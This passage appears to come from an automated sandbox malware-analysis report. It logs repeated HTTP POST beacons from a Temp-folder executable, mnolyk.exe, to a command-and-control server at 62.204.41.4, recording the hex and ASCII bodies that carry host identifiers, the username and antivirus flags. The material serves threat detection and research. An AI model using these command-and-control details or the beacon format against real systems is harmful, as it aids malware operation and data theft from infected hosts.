                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.243168116 CET569INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      124192.168.2.74985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:29.439543962 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.503218889 CET570INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      125192.168.2.74985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:29.678141117 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.742813110 CET571INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      126192.168.2.74985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:29.914060116 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.976921082 CET572INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      127192.168.2.74985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:30.146488905 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.211244106 CET573INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      128192.168.2.74985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:30.381462097 CET573OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.445030928 CET574INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      129192.168.2.74985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:30.616175890 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.680810928 CET575INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      13192.168.2.74973762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:00.769093990 CET445OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.832873106 CET445INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      130192.168.2.74985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:30.850297928 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:30.912975073 CET576INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      131192.168.2.74985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:31.085634947 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.152002096 CET577INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      132192.168.2.74985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:31.320590019 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.384737968 CET578INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      133192.168.2.74985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:31.553133011 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.617983103 CET579INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      134192.168.2.74986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:31.786990881 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:31.851413012 CET580INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      135192.168.2.74986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:32.032216072 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.098774910 CET581INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      136192.168.2.74986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:32.276209116 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.340869904 CET582INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      137192.168.2.74986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:32.512022972 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.576287985 CET583INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      138192.168.2.74986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:32.756227970 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:32.819240093 CET584INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      139192.168.2.74986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:32.990534067 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.054577112 CET585INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      14192.168.2.74973862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:01.020544052 CET446OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.085381031 CET446INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      140192.168.2.74986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:33.225481033 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:33.287621021 CET586INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
